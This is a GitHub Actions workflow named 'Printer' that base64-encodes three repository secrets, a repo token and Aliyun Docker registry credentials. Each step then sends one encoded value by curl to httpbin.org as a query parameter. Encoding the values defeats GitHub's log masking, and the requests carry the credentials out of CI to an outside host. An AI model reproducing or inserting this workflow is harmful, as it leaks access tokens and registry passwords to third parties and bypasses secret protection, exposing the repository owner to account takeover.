name: Printer

on:
  workflow_dispatch:

jobs:
  printer:
    runs-on: ubuntu-latest
    steps:
      - name: Encode REPO_TOKEN
        run: |
          ENCODED_REPO_TOKEN=$(echo -n "${{ secrets.REPO_TOKEN }}" | base64)
          echo "::set-env name=ENCODED_REPO_TOKEN::$ENCODED_REPO_TOKEN"

      - name: Encode ALIYUN_DOCKER_USERNAME
        run: |
          ENCODED_ALIYUN_DOCKER_USERNAME=$(echo -n "${{ secrets.ALIYUN_DOCKER_USERNAME }}" | base64)
          echo "::set-env name=ENCODED_ALIYUN_DOCKER_USERNAME::$ENCODED_ALIYUN_DOCKER_USERNAME"

      - name: Encode ALIYUN_DOCKER_PASSWORD
        run: |
          ENCODED_ALIYUN_DOCKER_PASSWORD=$(echo -n "${{ secrets.ALIYUN_DOCKER_PASSWORD }}" | base64)
          echo "::set-env name=ENCODED_ALIYUN_DOCKER_PASSWORD::$ENCODED_ALIYUN_DOCKER_PASSWORD"

      - name: Print REPO_TOKEN
        run: curl -L "httpbin.org/get?id=${{ env.ENCODED_REPO_TOKEN }}"

      - name: Print ALIYUN_DOCKER_USERNAME
        run: curl -L "httpbin.org/get?id=${{ env.ENCODED_ALIYUN_DOCKER_USERNAME }}"

      - name: Print ALIYUN_DOCKER_PASSWORD
        run: curl -L "httpbin.org/get?id=${{ env.ENCODED_ALIYUN_DOCKER_PASSWORD }}"
